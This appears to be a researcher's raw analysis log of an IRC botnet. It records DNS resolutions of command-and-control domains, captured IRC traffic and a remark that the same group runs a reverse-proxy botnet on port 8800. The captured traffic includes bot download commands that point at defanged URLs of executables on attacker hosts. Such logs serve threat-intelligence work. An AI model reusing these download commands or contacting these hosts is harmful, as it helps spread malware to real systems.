Resolved : [e.balkrev.com] To [124.232.150.214]
Resolved : [e.balkrev.com] To [60.172.229.40]
Resolved : [e.balkrev.com] To [124.232.163.154]
Resolved : [e.balkrev.com] To [124.232.163.150]
Resolved : [e.balkrev.com] To [124.232.163.119]
TCP Traffic:
e.balkrev.com:6510 PASS smart
Data received:
:Fax!Max@hub.us.com ppppmsg
n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi
[US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl
hxxp://146.185.246.160/43n.exe
!mdns hxxp://salsayvariando.com/av.txt
n[US{XPa{jikgbsd!jikgbsd@64.31.
JOIN :#mss
n[US{XPa{jikgbsd @ #mss so channels are :#dpi,#mss
Same group of heckers different malware sort a reverse proxy botnet in port 8800
connection to remote server: dq.proxylegitconnect.com port 8800
Resolved : [dq.proxylegitconnect.com] To [89.248.174.9]
Resolved : [dq.proxylegitconnect.com] To [89.248.172.167]
Resolved : [dq.proxylegitconnect.com] To [94.102.56.160]
Resolved : [dq.proxylegitconnect.com] To [93.174.93.39]
Resolved : [dq.proxylegitconnect.com] To [89.248.174.42]
Resolved : [dq.proxylegitconnect.com] To [89.248.172.174]
Resolved : [dq.proxylegitconnect.com] To [89.248.172.58]
Resolved : [dq.proxylegitconnect.com] To [93.174.93.204]
Resolved : [dq.proxylegitconnect.com] To [80.82.64.245]
Hosting infos:
http://whois.domaintools.com/124.232.150.214